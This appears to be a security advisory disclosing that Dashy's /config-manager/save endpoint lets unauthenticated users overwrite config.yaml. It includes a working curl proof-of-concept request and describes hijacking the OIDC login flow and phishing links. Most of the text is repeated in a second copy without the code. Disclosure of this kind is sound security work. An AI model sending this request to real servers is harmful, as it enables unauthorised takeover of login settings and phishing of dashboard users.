Summary
Users without proper authentication can edit the main config file (config.yaml)
Details
For context, I am running Dashy via docker and using OIDC for authentication:
appConfig:
language: en
layout: auto
iconSize: medium
theme: glass
auth:
enableOidc: true
oidc:
clientId: RED
endpoint: https://RED
scope: openid profile email
adminGroup: admin
Any user, whether logged in via OIDC as an admin, not as an admin but still logged in, or not logged in at all, is able to write any changes to the config.
PoC
Config I used on my server:
appConfig:
language: en
layout: auto
iconSize: medium
theme: glass
auth:
enableOidc: true
oidc:
clientId: RED
endpoint: https://RED
scope: openid profile email
adminGroup: admin
pageInfo:
title: Dashboard
navLinks: []
sections:
- name: Main
displayData:
sortBy: default
rows: 1
cols: 1
collapsed: false
hideForGuests: false
items:
- title: Example Website
url: https://example.com
target: newtab
id: 0_389_example
All you have to do is make a POST request to YOURDOMAIN/config-manager/save
That's it...
In the body, you need to provide the new config file to overwrite the old one with. An example of this with curl (a popular command line based request tool) would be:
curl 'YOURDOMAIN/config-manager/save' \
-H 'Accept: */*' \
-H 'Connection: keep-alive' \
-H 'Content-Type: application/json' \
--data-raw $'{"config":"appConfig:\\n language: en\\n layout: auto\\n iconSize: medium\\n theme: glass\\n auth:\\n enableOidc: true\\n oidc:\\n clientId: RED\\n endpoint: https://RED\\n scope: openid profile email\\n adminGroup: admin\\npageInfo:\\n title: Dashboard\\n navLinks: []\\n \\nsections:\\n - name: Main\\n displayData:\\n sortBy: default\\n rows: 1\\n cols: 1\\n collapsed: false\\n hideForGuests: false\\n items:\\n - title: NOT EXAMPLE\\n url: https://dashy.to\\n target: newtab\\n \\n id: 0_389_nexample\\n","timestamp":"2026-04-12T20:51:56.770Z","filename":""}'
What that request does is overwrite the entire servers configuration to use OIDC login, and use the glass theme, with a single section called "Main" with a single item called "NOT EXAMPLE" which leads to https://dashy.to which I believe is this repository's website. Anything you put in the request, if its valid syntax for Dashy's config, will be accepted and written onto the server, without any authentication at all.
Impact
An unauthenticated attacker can modify the dashboard configuration, including authentication settings (such as the OIDC provider URL) and service URLs displayed to users.
This allows the attacker to control the authentication flow by redirecting it to an attacker-controlled identity provider, enabling credential phishing and potential account compromise through manipulation of a trusted login process.
Service URLs shown in the dashboard can also be replaced with attacker-controlled links, allowing phishing of internal services by redirecting users to malicious replicas instead of legitimate endpoints.
This results in a loss of trust in both authentication and navigation within the dashboard, and may also impact availability of legitimate services by directing users to invalid or malicious targets.
ByteAfterlife Reporter
lissy93 Remediation developer
Summary
Users without proper authentication can edit the main config file (config.yaml)
Details
For context, I am running Dashy via docker and using OIDC for authentication:
Any user, whether logged in via OIDC as an admin, not as an admin but still logged in, or not logged in at all, is able to write any changes to the config.
PoC
Config I used on my server:
All you have to do is make a POST request to
YOURDOMAIN/config-manager/saveThat's it...
In the body, you need to provide the new config file to overwrite the old one with. An example of this with curl (a popular command line based request tool) would be:
What that request does is overwrite the entire servers configuration to use OIDC login, and use the glass theme, with a single section called "Main" with a single item called "NOT EXAMPLE" which leads to https://dashy.to which I believe is this repository's website. Anything you put in the request, if its valid syntax for Dashy's config, will be accepted and written onto the server, without any authentication at all.
Impact
An unauthenticated attacker can modify the dashboard configuration, including authentication settings (such as the OIDC provider URL) and service URLs displayed to users.
This allows the attacker to control the authentication flow by redirecting it to an attacker-controlled identity provider, enabling credential phishing and potential account compromise through manipulation of a trusted login process.
Service URLs shown in the dashboard can also be replaced with attacker-controlled links, allowing phishing of internal services by redirecting users to malicious replicas instead of legitimate endpoints.
This results in a loss of trust in both authentication and navigation within the dashboard, and may also impact availability of legitimate services by directing users to invalid or malicious targets.